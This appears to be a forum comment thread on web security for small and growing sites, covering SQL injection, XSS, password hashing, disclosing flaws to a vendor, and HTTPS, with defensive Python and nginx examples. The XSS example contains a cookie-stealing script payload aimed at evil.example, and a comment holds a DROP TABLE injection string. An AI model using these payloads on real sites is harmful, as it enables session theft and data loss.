Needless to say, it didn't work. It's also worth noting that we never noticed any service disruptions caused by a third party. We were small fish.
Which leads me to the following: security is a scaling issue. Sure, in most use cases your prototype doesn't really need to be secured, even once it's ready to go live. But once you start to grow, especially rapidly, things can easily spin out of control.
You need some time to get a proper certificate, your database looks like the development version on your local machine, you've handed out a few SSH keys via e-mail, the root key for the deployment server is on a few USB sticks lying around (since someone has to take care of it while you sleep), you log in over public networks to get at company resources you need ASAP, etc.
What I'm really interested in is: how does one scale it? What are the priorities?
This adds a bit more up-front planning pain to any project and also slightly slows down the daily dev routine, BUT it pays dividends further down the line when you suddenly start getting noticed and your usage figures begin multiplying every 24 hours. In that situation there isn't time to rework production DBMS schemas, change the app code to deal with bcrypt'd password hashes, or harden the deployment script so you don't accidentally drop a dev version of the site onto your public servers, etc. etc.
Better to pay the up-front cost of getting the basics correct at the beginning of the project than to deal with an uncontained explosion later on, just as you hit the limelight.
Also, the up-front pain of doing this diminishes with every additional project, as a lot of the concepts, approaches, and procedures are reusable.
Totally agree on that last part. The pain rapidly diminishes as you come up with simpler ways to do things in a reusable way. Also, the tools to do it are getting better and better as more and more people are feeling the same pain.
For instance, properly escaping output, parameterized queries, password hashing -- all those don't require more work (or if they do, it's so, so minimal). I mean, jeez, you're writing the code, just do it right.
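To make the "just do it right" point concrete, here is a minimal sketch of two of those basics together: parameterized queries and salted, slow password hashing. The thread mentions bcrypt; this sketch uses stdlib PBKDF2 as a stand-in, and the table/function names are hypothetical.

```python
import hashlib
import hmac
import os
import sqlite3

# In-memory database standing in for a real user table.
db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE users (name TEXT PRIMARY KEY, salt BLOB, hash BLOB)")

def hash_password(password: str, salt: bytes) -> bytes:
    # PBKDF2 as a stdlib stand-in for bcrypt; the point is the same:
    # a slow, per-user-salted hash instead of plain MD5/SHA1.
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)

def create_user(name: str, password: str) -> None:
    salt = os.urandom(16)
    # Parameterized query: the driver treats the values as data, so a
    # name like "x'; DROP TABLE users; --" is stored, never executed.
    db.execute("INSERT INTO users VALUES (?, ?, ?)",
               (name, salt, hash_password(password, salt)))

def check_login(name: str, password: str) -> bool:
    row = db.execute("SELECT salt, hash FROM users WHERE name = ?",
                     (name,)).fetchone()
    return row is not None and hmac.compare_digest(
        hash_password(password, row[0]), row[1])
```

Note that this is barely more code than string-concatenated SQL and a bare `md5()` call, which is exactly the point being made above.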
That's a far cry from setting up multiple servers, certificates, etc. and having a real operations process. I can forgive, say, not having automatic builds. But there's no excuse for having a SQL injection in 2012.
As a disclaimer, though: I clearly state to such clients that security won't really be up to scratch on those timelines. They usually don't care, to the point that I've stopped bothering anyone with it, since I get blank stares whenever I discuss security with them.
I can assure you that the blank stares go away completely when there is a breach. You will probably learn by then that your customers just expect you to handle it professionally. They might not be able to think beyond their deadline and their first business goal, but leaking passwords or losing user data will be your fault eventually.
I will not pretend that all my past work is bulletproof, but it shouldn't be so difficult to make sure your tools and code handle all incoming data like hot grenades. You might skip some big up-front user import in the beginning while you control the data chain, but $_POST or params[:model] or whatever else is flying in your face should get the standard treatment.
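The "standard treatment" for incoming params can be as small as a whitelist filter, in the spirit of Rails' strong parameters. A minimal sketch (the field names and `permit` helper are hypothetical):

```python
# Only the fields a form is expected to send; everything else is dropped.
ALLOWED_FIELDS = {"name", "email"}

def permit(params: dict, allowed: set = ALLOWED_FIELDS) -> dict:
    # Keep only expected keys, so a stray "is_admin=1" smuggled into the
    # POST body can never reach a mass-assignment / model-update call.
    return {k: v for k, v in params.items() if k in allowed}
```

Validation of the surviving values (types, lengths, formats) still belongs on top of this, but the whitelist alone kills the classic mass-assignment hole.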
Think of it this way: right now you do not want your CV to say "2012: developed user login module for LinkedIn. Finished within the deadline."
While a small site might not be targeted directly, you might still get hit by an automated attack if you use any off-the-shelf software. It's not fun when Google marks your site as harmful because your OpenX ad server suddenly serves malicious ads.
Well written article that strikes the right tone.
However, some of those basic injection flaws in classic ASP would not have been possible on a more modern technology stack, whether from Microsoft or elsewhere. A five-year-old version of PHP also isn't going to do you any favours. Newer frameworks are simply better at saving you from yourself, but that doesn't excuse the sloppy practices.
This kind of stuff happens, but in essence Billabong's sysadmin needs to start surfing exploit mailing lists more than he's surfing other places :)
Ditto with XSS.
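The framework point holds for XSS too: modern template engines escape by default, whereas raw string interpolation does not. A minimal sketch of escaping on output, using Python's stdlib `html` module (the `render_comment` helper is hypothetical):

```python
import html

def render_comment(author: str, body: str) -> str:
    # Escape on output: any HTML the user typed becomes inert text.
    return "<p><b>{}</b>: {}</p>".format(html.escape(author),
                                         html.escape(body))

payload = '<script>new Image().src="//evil.example/?c="+document.cookie</script>'
print(render_comment("mallory", payload))
# The markup survives only as &lt;script&gt;... entities, so the
# browser renders it as text instead of executing it.
```

Auto-escaping templates do exactly this for every substitution, which is why forgetting it becomes the exception rather than the rule.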
What should I do now?
Last time, I pointed them to some Wikipedia articles relating to their vulnerabilities.
However, this might depend on where you live. Some countries (like the UK, where I'm typing this from) make testing a website for vulnerabilities illegal, no matter how serious the issue or how good the intentions. Very few people are actually caught under these laws, but there is always a risk that you piss off a litigious company, which then goes after you.
I probably wouldn't have done that if I didn't already have a relationship with the vendor, though. I don't want to be accused of extortion or cyberterrorism.
I would say the biggest concern is that you could become a target. Say that you, in good faith, inform them that you can buy items for free due to an injection attack. Four days later, someone else buys $10,000 worth of gear using the same exploit. They now have only one suspect: you.
If you do feel the need to spill who is at fault, you can do it in the comments or in a follow-up post at a later date.
As it is only a small shop, I think I will email them again, but this time with a link that points to a more verbose description of the vulnerability, as someone mentioned.
You could apparently serve the author a form over SSL, have it post to a malicious server, and he'd be none the wiser because he's focused on whether the empty form was sent over an encrypted socket.
I am unaware of any protocol semantics that allow an HTTP server to determine how the submitted data was marshaled.
As Facebook learned, submitting to an HTTPS server isn't enough, the form must be too. Otherwise you can be man-in-the-middle attacked on the form page. Better yet, serve everything over HTTPS, so people can't change the links.
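"Serve everything over HTTPS" usually comes down to a blanket redirect plus an HSTS header. A sketch of what that might look like in nginx; the domain and certificate paths here are placeholders, not from the original discussion:

```nginx
server {
    listen 80;
    server_name example.com;
    # Redirect every plain-HTTP request, so the login form itself is
    # always served over TLS and can't be rewritten in transit.
    return 301 https://$host$request_uri;
}

server {
    listen 443 ssl;
    server_name example.com;
    ssl_certificate     /etc/ssl/example.com.crt;
    ssl_certificate_key /etc/ssl/example.com.key;
    # HSTS: tell returning browsers to refuse plain HTTP for this host.
    add_header Strict-Transport-Security "max-age=31536000";
    # ... rest of the site config ...
}
```

The redirect closes the "form page served over HTTP" hole for first-time visitors; HSTS closes it for everyone who has visited at least once.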
That's VERY different from a man-in-the-middle attack.
Do you think the coffee shop should have offered encrypted wifi?